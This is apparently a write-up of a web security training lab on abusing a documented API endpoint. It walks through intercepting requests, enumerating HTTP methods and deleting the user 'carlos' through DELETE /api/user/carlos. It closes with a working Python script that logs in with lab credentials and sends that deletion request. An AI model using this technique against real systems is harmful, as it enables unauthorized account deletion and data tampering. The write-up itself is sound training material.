# 1. Exploiting an API endpoint using documentation Accessing the lab webpage:

Looking at the request that intercepted using the burpsuite: We found an API endpoint, or for example we can try it manually to see the responses, or brute force it to get a hit:

Or we can just update our email and we will get it as a request:

Lets try it: Using options method we can use these methods:

Lets do GET: We got a response with JSON formats:

Maybe we need to specify a user, lets try wiener:

Lets try carlos if it is exists: And here we go:

And now as the objective, we have to delete carlos user to solve the lab, and remember we can use DELETE method as shown above:

Here we go:

Trying PATCH on wiener:

Lets do GET on /api:

Solve it using a `python3` script: ```python import requests import re import os import sys proxies = { "http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080" } session = requests.session() def Login(username, password): print("[*] Get CSRF Token.") csrf = re.findall(r'name="csrf" value="(.+?)"', session.get(url=url + "login", proxies=proxies, verify=False).text) print("[*] Logging In.") data = f"csrf={csrf[0]}&username={username}&password={password}" session.post(url=url + "login", data=data, allow_redirects=True, proxies=proxies, verify=False) def DeleteCarlos(): print("[*] Delete The User Carlos.") session.delete(url=url + "api/user/carlos", proxies=proxies, verify=False) if __name__ == "__main__": if len(sys.argv) != 2: script_name = os.path.basename(__file__) print(f"[-] Usage: python {script_name} http://localhost/") sys.exit(1) url = sys.argv[1] Login("wiener", "peter") DeleteCarlos() print("[+] Solved.") ```